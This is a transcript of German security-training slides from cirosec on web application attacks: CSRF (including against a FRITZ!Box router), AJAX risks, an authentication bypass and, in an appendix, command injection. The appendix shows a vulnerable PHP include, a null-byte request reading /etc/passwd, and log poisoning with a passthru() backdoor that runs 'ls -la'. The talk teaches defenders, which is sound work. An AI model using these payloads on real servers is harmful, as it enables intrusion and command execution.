Unix Friends and User Campus Kamp Aktuelle Angriffstechniken auf Web-Applikationen

Transkript

1 Unix Friends and User Campus Kamp Aktuelle Angriffstechniken auf Web-Applikationen Steffen Tröscher cirosec GmbH, Heilbronn

2 Steffen Tröscher Dipl.-Informatiker (FH) IT-Sicherheitsberater Tätigkeitsschwerpunkte: Penetrationstests auf Web-Applikationen, Betriebssystem- und Netzwerkebene Trainer von Hacking Schulungen

3 cirosec GmbH Beratungsunternehmen in Heilbronn derzeit 26 Mitarbeiter Fokus auf innovative IT-Sicherheit: Penetrationstests, Audits Schulungen konzeptionelle Analyse.. Angebot an Studenten: Durchführung Praktikum oder Thesis

4 Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken Neue Sicherheitsrisiken durch Web 2.0 -Technologien wie AJAX

5 Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken Neue Sicherheitsrisiken durch Web 2.0 -Technologien wie AJAX

6 Bug-Parade Schwachstellensammlungen OWASP: Top 10 SANS/MITRE: Top 25 der gefährlichsten Programmierfehler (siehe ix 03/2009)

7 OWASP Top 10 A1 A2 Injection Cross Site Scripting A3 Broken Authentication & Session Management A4 Insecure Direct Object Reference A5 Cross Site Request Forgery (CSRF) A6 Security Misconfiguration A7 Failure to Restrict URL Access A8 Unvalidated Redirects and Forwards A9 Insecure Cryptographic Storage A10 Insufficient Transport Layer Protection

8 OWASP Top 10 A1 A2 Injection Cross Site Scripting A3 Broken Authentication & Session Management A4 Insecure Direct Object Reference A5 Cross Site Request Forgery (CSRF) A6 Security Misconfiguration A7 Failure to Restrict URL Access A8 Unvalidated Redirects and Forwards A9 Insecure Cryptographic Storage A10 Insufficient Transport Layer Protection

9 Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken Neue Sicherheitsrisiken durch Web 2.0 -Technologien wie AJAX

10 Cross-Site Request Forgery (CSRF) Andere Begriffe XSRF Session Riding URL Command Attack Unbemerktes und unerwünschtes Ausführen von Aktionen im Kontext eines angemeldeten Benutzers, z.b. Passwortänderung Einträge in Foren / Blogs Kaufen / Verkaufen von Aktien

11 CSRF HTTP-Anfrage 1 GET / HTTP/1.1 Host: CSRF-Angriff 3 GET/transfer?recipient=hacker &amount=100 HTTP/1.1 Host: beispiel.de Opfer cirobank.de HTTP-Antwort 2 HTTP/ OK... <html>... <img src= />... </html>

12 Cross-Site Request Forgery (CSRF) Schwachstelle liegt in der Webanwendung Keine erneute Verifikation der Identität beim Aufruf einer Aktion Anfragen sind statisch und vorhersagbar Es werden keine Shared Session Secrets eingesetzt Die Applikation vertraut einem einmal angemeldeten Benutzer

13 CSRF Angriffsvektoren Verteilung über -Nachrichten im HTML-Format Einbinden in andere bekannte Internetseiten Gästebücher, Foren, etc. Die Möglichkeit Bilder einzubinden reicht aus, um eine Angriffs-URL einzubetten Ausnutzung persistenter/nicht-persistenter Cross-Site-Scripting-Schwachstellen

14 Demonstration Cross-Site-Request Forgery (CSRF) innerhalb der cirobank

15 CSRF erkennen Aus Sicht der Webapplikation schwierig, da Legitimer HTTP-Request Aufruf einer legitimen Applikations-Funktion Anfrage von einem authentisierten Benutzer Erkennung über den HTTP-Referer? Beispiel:

16 CSRF erkennen (HTTP-Referer) Facebook wertet den HTTP-Referer aus: Referer: Referer: Was passiert, wenn kein Referer vorhanden ist?

17 CSRF erkennen (HTTP-Referer) Facebook wertet den HTTP-Referer aus: Referer: Referer: Was passiert, wenn kein Referer vorhanden ist? Warnmeldung wird eingeblendet Anfrage wird dennoch ausgeführt Hintergrund: Proxies, Browser, Anti-Viren- Software etc. Filtern den HTTP-Referer Benutzer würden ausgesperrt werden

18 CSRF ins interne Netz HTTP-Anfrage 1 GET / HTTP/1.1 Host: Intranet beispiel.de Gateway / Firewall Opfer 3 HTTP-Antwort 2 HTTP/ OK... <html>... <img src= />... </html> CSRF-Angriff

19 CSRF-Angriff auf die FRITZ!Box Standardmäßig ist das Webinterface der FRITZ!Box nicht passwortgeschützt Die FRITZ!Box prüft ebenfalls den HTTP-Referer

20 Demonstration Aktivieren des Remote-Zugangs einer FRITZ!Box über CSRF

21 Schutz vor CSRF Behebung der Schwachstelle auf Server-Seite: Zufalls-Token, so dass eine Anfrage nicht vorhergesagt werden kann Einsatz von CAPTCHA / TAN-Nummern Schutz auf Client-Seite: Abmelden nach Benutzung einer Applikation Browser-Plugins, wie z.b. NoScript (Firefox)

22 Gliederung Schwachstellen-Überblick Präsentation aktueller Angriffstechniken Neue Sicherheitsrisiken durch Web 2.0 -Technologien wie AJAX

23 Was ist AJAX? Asynchronous JavaScript and XML HTTP-Anfragen innerhalb einer HTML-Seite, ohne die Seite komplett neu laden zu müssen Seit 2005, Technik existiert in vergleichbarer Form aber schon seit 1998 (Outlook Web Access/IE4) Nutzung in vielen bekannten Websites: Google Suggest Google Maps Flickr Del.icio.us

24 Klassisches Modell einer Webanwendung Serverseitig Browser Datenbank HTML & CSS HTTP-Transport HTML / CSS HTTP(S)-Verkehr Applikationsserver Webserver

25 AJAX-Modell einer Webanwendung Browser HTML & CSS Serverseitig Javascript XHR-Objekt HTTP-Transport XML / JSON HTTP(S)-Verkehr Datenbank Applikationsserver Webserver Verlagerung der Applikationslogik auf Clientseite

26 Kombination von Technologien HTML/XHTML Document Object Model zur Repräsentation der Inhalte JavaScript zur Manipulation des DOM XMLHttpRequest-Objekt für den asynchronen Datenaustausch mit dem Webserver

27 klassischer Prozessfluss Client Benutzeraktivität Benutzeraktivität Benutzeraktivität Zeit (t) Server Verarbeitung durch das System Verarbeitung durch das System

28 AJAX Prozessfluss Client Benutzeroberfläche Benutzeraktivität AJAX-Bibliothek Clientseitige Verarbeitung Server Verarbeitung durch das System Verarbeitung durch das System Verarbeitung durch das System

29 Codebeispiel AJAX xmlhttp = new XMLHttpRequest(); xmlhttp.open('get', 'beispiel.xml', true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readystate == 4) { alert(xmlhttp.responsetext); } }; xmlhttp.send(null);

30 Alte Gefahren......bleiben die Gleichen AJAX-Anfragen sind ganz normale HTTP-Requests, die der Webserver nicht unterscheiden kann Bekannte Angriffe wie SQL-Injection, XSS oder File-Inclusion bestehen auch auf AJAX-Basis weiter fort

31 Neue Sicherheitsrisiken von AJAX Server-seitig: Vergrößerung der Angriffsoberfläche durch mehr Parameter, die geprüft werden müssen Unzureichende Eingabevalidierung der Anfragen Unauthentisierte/unautorisierte Nutzung von AJAX-Schnittstellen Client-seitig: Verlagerung der Logik auf Client-Seite Ausführung von JavaScript-Code in AJAX- Responses auf dem Client

32 Umgehung der Authentisierung Client Server Benutzername / Kennwort Benutzer authentisiert Anmeldemaske ausblenden Aktion im geschützten Bereich Ausreichende Berechtigung??

33 Umgehung der Authentisierung Client Server Benutzername / Kennwort Benutzer authentisiert Anmeldemaske ausblenden Aktion im geschützten Bereich Erfolgt nicht! Ausreichende Berechtigung??

34 Demonstration Umgehung einer AJAXbasierten Authentisierung

35 Vielen Dank!

36 Zusatz

37 Command Injection über File Inclusion

38 Command Injection Ausschnitt aus dem fehlerhaften PHP-Skript: : <h3>tipptopp-aktuell:</h3> <div class="left_box"> <?php if($_get['include']) { if((substr($_get['include'],-4,4) == 'html')) { include($_get['include']); } else { echo "<strong>es können nur Dateien eingebunden werden, die auf.html enden! </strong>"; } }?>

39 Command Injection 1. Schwachstelle: File Inclusion

40 Command Injection 1. Schwachstelle: File Inclusion Aufruf der URL: ude=/etc/passwd%00.html

41 Command Injection

42 Command Injection 2. Schwachstelle: Command Injection Ideen?

43 Command Injection 2. Schwachstelle: Command Injection Ziel: PHP basierte Backdoor (passthru()) PHP-Code einschleusen, der zur Ausführung kommt Problem: Wo können wir PHP-Code hinterlegen? Oder anders: Wo kann Apache schreibend zugreifen?

44 Command Injection 2. Schwachstelle: Command Injection Idee: Einschleusen von PHP-Code in Apache Logfile (access_log, error_log) Alternativen: FTP Logfile (Loginname = PHP-Code) Prozess-Tabelle (User-Agent in /proc/self/environ) Session-Files (PHP-Code in Session-ID) Dann: Einbinden der Datei, damit PHP-Code zur Ausführung kommt

45 Command Injection 2. Schwachstelle: Command Injection Aber: Wird PHP-Code ausgeführt? Kommt auf die verwendete PHP-Funktion an, die die Schwachstelle aufweist. Anfällige Funktionen: include() include_once() require() require_once()

46 Command Injection Ausschnitt aus dem fehlerhaften PHP-Skript: : <h3>tipptopp-aktuell:</h3> <div class="left_box"> <?php if($_get['include']) { if((substr($_get['include'],-4,4) == 'html')) { include($_get['include']); } else { echo "<strong>es können nur Dateien eingebunden werden, die auf.html enden! </strong>"; } }?>

47 Command Injection 2. Schwachstelle: Command Injection Einschleusen des PHP-Code in die Datei /var/log/httpd/access_log Aufruf der URL: a=<?passthru($_get[cmd])?>

48 Command Injection

49 Command Injection Währendessen im Webserver Logfile: [30/Oct/2009:08:17: ] "GET /images/corner.gif HTTP/1.1" " a=<?passthru($_get[cmd])?>" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;.NET CLR ;.NET CLR ;.NET CLR ;.NET CLR ;.NET CLR ;.NET CLR )"

50 Command Injection 2. Schwachstelle: Command Injection Ausführen des eingeschleusten Codes OS-Kommando: ls -la Aufruf der URL: include=/etc/httpd/logs/access_log%00.html&cmd=ls -la

51 Command Injection